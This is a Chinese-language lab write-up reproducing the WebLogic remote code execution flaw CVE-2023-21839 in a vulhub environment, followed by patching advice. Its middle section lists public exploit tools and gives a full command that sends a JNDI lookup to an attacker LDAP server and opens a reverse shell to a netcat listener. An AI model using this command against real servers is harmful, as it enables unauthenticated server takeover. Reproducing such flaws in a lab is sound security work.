漏洞简介

        WebLogic Core远程代码执行漏洞（CVE-2023-21839），该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议进行 JNDI lookup 操作，破坏易受攻击的WebLogic服务器，成功利用此漏洞可能导致Oracle WebLogic服务器被接管（RCE）或敏感信息泄露。

复现环境

        靶机：kali vullhub docker启动：192.168.42.147

        攻击机：kali 192.168.42.145

复现过程

• 在靶机上启动vulhub的靶场环境，进入如下目录启动

         启动成功

• 使用工具JNDIExploit-4-SNAPSHOT.jar在kali上设置监听

1.        工具地址及其使用说明：https://github.com/WhiteHSBG/JNDIExploit

          这个工具是同时启动了http和ldap服务

   1.       

• 打开kali使用nc工具进行端口的监听，用于接收反弹的shell

• 使用CVE-2023-21839工具来进行攻击测试

 工具地址：https://github.com/DXask88MA/Weblogic-CVE-2023-21839

 使用命令：

java -jar Weblogic-CVE-2023-21839.jar 192.168.42.147:7001 ldap://192.168.42.145:1389/Basic/ReverseShell/192.168.42.145/7777

• 此时监听的攻击机已经收到了反弹的shell

 至此攻击已经成功

• 最后关闭靶机

 处置修复

参考修复链接：https://www.oracle.com/security-alerts/cpujan2023.html

1. 升级版本
2. 安装补丁
3. 若非必须开启，请禁用T3和IIOP协议。

相关修复链接见https://mp.weixin.qq.com/s/MgO_KJQiEXK_GpVACI2pJg